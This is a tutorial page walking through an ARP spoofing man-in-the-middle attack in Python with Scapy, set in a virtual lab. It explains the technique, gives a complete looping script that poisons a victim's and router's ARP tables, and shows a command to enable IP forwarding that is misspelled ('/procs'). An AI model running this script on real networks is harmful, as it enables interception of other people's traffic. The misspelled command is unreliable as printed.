How to make an ARP Spoofing attack using Scapy – Python
Last Updated :
18 Apr, 2023
In this article, we are going to discuss the ARP Spoofing attack using Python programming. Before going deep into the code first let’s understand some basic topics of what is ARP Spoofing and what it does.
ARP Spoofing:
The ARP spoofing is the technique to fool a computer or a device which accepts the ARP response packets even though the device does not request it. As the device accepts the response packet without its knowledge, we can easily mess up with the hack and the hacker takes the advantage of this by sending a modified ARP response packet which contains the modified MAC address of the client with the hacker’s IP address to the router to fool and then simultaneously send the same ARP response packet to the victim saying that I am router. To achieve this attack the hacker sends an ARP response packet to the victim saying that “I am the router with the MAC address (hacker machine address) “and at the same time the hacker sends the same ARP response packet to the router saying that “I am the victim with this MAC address (hacker machine MAC address). Due to ARP request the victim and router will modify their network tables with the respective MAC address provided by the hacker. This can be easily understood by the below figure.
Before the ARP Spoofing attack the connection between the hacker and victim
After the attack the connection between the victim and the hacker
How to make an ARP Spoofing attack using Scapy in Python
Note: Here the attacks are performed under a virtual environment (virtual box) with the Linux operating system as the hacker machine, Windows 10 as the victim machine and our home router as a router. This attack only works when all the devices are in the same network. Here, we are using a NAT network to create this attack.
Step 1: To implement this code in Python we are going to use a package called scapy. First, we are going to create an ARP packet using the scapy package. Here, we are not creating an ARP request, but instead, we are creating an ARP response packet. So, we are going to let us know what fields we need to set in order to make the ARP packet as a response packet in Python as follows. In scapy the ARP packet is created using the syntax as shown below.
Python3
import scapy. all as scapy
scapy.ARP()
print (scapy.ls(scapy.ARP()))
|
Output:
Step 2: Now let’s understand the code by first getting the MAC address of the device with its IP address with the below code. First, we are using the above-mentioned scapy module to generate an ARP packet to the given IP address.
Python3
arp_request = scapy.ARP(pdst = ip)
|
Then create a broadcast message with a MAC address to broadcast MAC that is “ff:ff:ff:ff:ff:ff” as shown below.
Python3
broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff" )
|
Then we combine the broadcast packet with the ARP request.
Python3
arp_request_broadcast = broadcast / arp_request
|
Then sent to the victim’s IP address and to do so we use scapy.srp() as shown below.
Python3
answ = scapy.srp(arp_request_broadcast, timeout = 1 , verbose = False )[ 0 ]
|
Step 3: Now let’s combine the MAC address statements above-mentioned with in a function and then you them with our while loop to continuously fool the devices.
Python3
import time
import sys
import scapy. all as scapy
def get_mac(ip):
arp_request = scapy.ARP(pdst = ip)
broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff" )
arp_request_broadcast = broadcast / arp_request
answ = scapy.srp(arp_request_broadcast, timeout = 1 , verbose = False )[ 0 ]
return answ[ 0 ][ 1 ].hwsrc
def arp_spoof(target_ip, spoof_ip):
packet = scapy.ARP(op = 2 , pdst = target_ip,
hwdst = get_mac(target_ip), psrc = spoof_ip)
scapy.send(packet, verbose = False )
victim_ip = input ()
router_ip = input ()
sent_packets_count = 0
while True :
sent_packets_count + = 2
arp_spoof(victim_ip, router_ip)
arp_spoof(router_ip, victim_ip)
print ( "[+] Packets sent " + str (sent_packets_count), end = "\r" )
sys.stdout.flush()
time.sleep( 2 )
|
Output:
After implementing the program the victim does not get the internet connection because the packets are forwarded to the hacker’s machine and in order to allow the flow of packets we need to run a command in a Linux shell as below.
echo 1 > /procs/sys/net/ipv4/ip_forward
The victim ARP table is shown below:
Like Article
Suggest improvement
Share your thoughts in the comments
Please Login to comment...